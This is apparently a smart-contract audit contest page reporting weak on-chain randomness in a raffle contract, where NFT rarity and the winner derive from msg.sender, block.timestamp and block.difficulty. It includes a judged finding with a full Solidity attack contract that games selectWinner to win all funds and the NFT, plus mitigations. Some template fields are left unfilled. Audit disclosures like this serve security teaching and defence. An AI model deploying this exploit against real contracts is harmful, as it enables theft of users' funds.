High-Value NFTs Can Be Selectively Minted, Breaking Scarcity and Collection Value
Root + Impact
The inputs used are easily influenced or guessed, attackers can repeatedly interact with the raffle until they force a desired outcome. This predictability lets them farm rare or legendary NFTs at will, breaking fairness, destroying scarcity, and undermining trust in the raffle system
Description
The contract generates NFT rarity using a hash of msg.sender, block.timestamp and block.difficulty, the values that are either fully controlled by the caller or predictable and influenceable at execution time. Because the rarity calculation is deterministic, attackers can simulate the outcome off-chain before submitting a transaction and only proceed when the result yields a high-rarity NFT. This enables systematic farming of rare and legendary NFTs, undermining the intended probability distribution and breaking fairness guarantees. Additionally, validators and MEV bots can exploit their control over transaction ordering and inclusion to selectively mint valuable NFTs, leading to economic imbalance, scarcity dilution, and loss of trust in the raffle’s integrity.
Risk
Likelihood:
-
Reason 1 // Describe WHEN this will occur (avoid using "if" statements)
-
Reason 2
Impact:
-
Impact 1
-
Impact 2
Proof of Concept
An attacker computes the rarity off-chain using the current block.difficulty and a chosen sender address, submits the transaction only when the modulo result falls within the desired rarity range, and discards or withholds all other attempts. This process can be repeated at negligible cost until a high-rarity outcome is guaranteed.
Recommended Mitigation
Replace on-chain predictable randomness with a verifiable randomness source such as Chainlink VRF.
Use commit‑reveal schemes to prevent manipulation.
Avoid using miner‑controlled or predictable values (block.timestamp, block.difficulty, msg.sender) for randomness.
Lead Judging Commences
[H-03] Randomness can be gamed
## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Judging
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsRewards Distribution
The contest is complete and the rewards are being distributed.